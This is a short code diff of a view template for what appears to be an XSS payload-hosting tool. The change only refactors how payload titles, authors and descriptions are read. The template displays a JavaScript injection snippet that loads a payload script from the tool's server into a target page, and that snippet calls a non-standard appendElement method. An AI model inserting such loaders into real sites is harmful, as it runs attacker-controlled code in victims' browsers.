--- a/views/payloads.erb
+++ b/views/payloads.erb
@@ -2,19 +2,19 @@
 <div class="entry <% if i == 0 %>expanded<% else %>collapsed<% end %>">
 	<div class="titlebar">
 		<a class="toggle" href="#"><span>collapse</span></a>
-		<span class="title"><%= entry[:title] %></span>
+		<span class="title"><%= entry.title %></span>
 	</div>
 	<table class="details">
-		<% if !entry[:author].empty? %>
+		<% if !entry.author.empty? %>
 		<tr>
 			<th><span>AUTHOR</span></th>
-			<td class="longwrap"><%= entry[:author] %></td>
+			<td class="longwrap"><%= entry.author %></td>
 		</tr>
 		<% end %>
-		<% if !entry[:description].empty? %>
+		<% if !entry.description.empty? %>
 		<tr>
 			<th><span>INFO</span></th>
-			<td><%= entry[:description] %></td>
+			<td><%= entry.description %></td>
 		</tr>
 		<% end %>
 		<tr>
@@ -22,7 +22,7 @@
 			<td class="longwrap">
 				<div class="injection">
 					var x = document.createElement('script');
-					x.src = '<%= request.scheme %>://<%= request.host %>:<%= request.port %>/payloads/<%= entry[:shortname] %>.js';
+					x.src = '<%= request.scheme %>://<%= request.host %>:<%= request.port %>/payloads/<%= entry.shortname %>.js';
 					document.body.appendElement(x);
 				</div>
 			</td>
